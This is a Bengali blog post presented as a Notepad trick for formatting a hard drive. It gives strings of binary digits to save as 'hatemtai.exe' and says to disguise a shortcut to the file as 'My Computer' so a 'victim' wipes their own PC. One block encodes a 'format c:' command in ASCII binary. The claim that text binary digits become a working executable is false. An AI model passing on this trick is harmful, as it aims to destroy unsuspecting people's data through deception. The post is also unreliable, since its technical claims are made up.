নতুন কিছু জানতে ও জানাতে ভাল লাগে। মানবাধিকার নিয়ে কাজ করার অনেক ইচ্ছা। আমরা অনেকেই হয়তো জানি না, নোটপ্যাড একটি হেক্সাডেসিমাল এবং বায়নারি এডিটর হিসেবে কাজ করতে পারে। আর এটি ব্যবহার করে আপনি সিস্টেম কনফিগারেশন ফাইলে অনেক পরিবর্তন আনতে পারবেন। আজকে আমরা দেখবো নোটপ্যাড ব্যবহার করে কিভাবে একটি হার্ডড্রাইভ ফরমেট করা যায়।
01001011000111110010010101010101010000011111100000
১. উপরের বাইনারি কোডটি কপি করে একটি টেক্সট প্যাড এ পেস্ট করুন।
২. তারপর টেক্সট ফাইল টি hatemtai.exe নামে সেভ করুন।
৩. এর পর ফাইল টি কম্পিউটার এর যে কোন ড্রাইভ এ সেভ করে রাখুন। ।
৪. এবং এর একটি শর্টকাট লিঙ্ক ডেক্সটপে পেস্ট করুন।
৫. শর্টকাট লিঙ্কটির Properties >> Change Icon থেকে এর আইকন My Computer এর মত করে দিন।
৬. রিনেম করে My Computer টাইপ করুন
৭. এবার আসুল My computer টি Delete করে দিন।
৮. হে হে কাম শেষ। কেল্লা ফতে
এবার বলা যাক আমরা এতক্ষণ করলাম কি? যে কোড দেয়া হয়েছে তা কোন পিসি তে রান করলে পুরো পিসি ফরমেট হয়ে যাবে। আর এর শর্টকাট কীটি করা হয়েছে ঠিক মাই কম্পিউটার এর মত।
তাই ভিকটিম তার নিজের নিজের অজান্তেই ফরম্যাট করে ফেলবে মাই কম্পিউটার এ ক্লিক করে। কোন কিছু আর করার থাকবে না।
যদি C drive ফরম্যাট করতে সমস্যা হয়। তা হলে নিচের Code টি ব্যাবহার করতে পারেন।
01100110011011110111001001101101011000010111010000
100000011000110011101001011100
0010000000101111010100010010111101011000
।
অনলাইনে ছড়িয়ে ছিটিয়ে থাকা কথা গুলোকেই সহজে জানবার সুবিধার জন্য একত্রিত করে আমাদের কথা । এখানে সংগৃহিত কথা গুলোর সত্ব (copyright) সম্পূর্ণভাবে সোর্স সাইটের লেখকের এবং আমাদের কথাতে প্রতিটা কথাতেই সোর্স সাইটের রেফারেন্স লিংক উধৃত আছে ।